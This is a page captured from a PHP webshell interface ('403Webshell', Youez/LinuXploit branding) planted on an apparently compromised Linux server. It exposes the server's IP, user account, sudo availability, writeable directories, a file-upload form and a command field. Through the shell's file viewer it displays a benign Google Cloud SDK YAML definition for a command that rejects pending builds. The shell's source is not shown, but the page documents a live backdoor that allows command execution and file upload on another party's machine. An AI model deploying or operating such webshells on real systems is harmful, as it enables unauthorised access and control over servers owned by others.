403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/google-cloud-sdk/lib/surface/builds/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/google-cloud-sdk/lib/surface/builds/reject.yaml
- release_tracks: [ALPHA, BETA]
  command_type: GENERIC
  help_text:
    brief: Reject a pending build.
    description: Reject a pending build.
    examples: |
      To reject a pending build with its ID, run:

        $ {command} build-id

      To reject multiple pending builds, run the command in a for loop:

        $ for i in $(cat build-ids.txt); do {command} $i; done

  request:
    collection: cloudbuild.projects.builds
    api_version: v1
    method: approve
    static_fields:
      approveBuildRequest.approvalResult.decision: REJECTED
  arguments:
    resource:
      help_text: "Build."
      spec: !REF googlecloudsdk.command_lib.cloudbuild.resources:build

    params:
    - api_field: approveBuildRequest.approvalResult.comment
      arg_name: comment
      help_text: Optional comment to annotate the build's rejection.
    - api_field: approveBuildRequest.approvalResult.url
      arg_name: url
      help_text: Optional URL to annotate the build's rejection.

Youez - 2016 - github.com/yon3zu
LinuXploit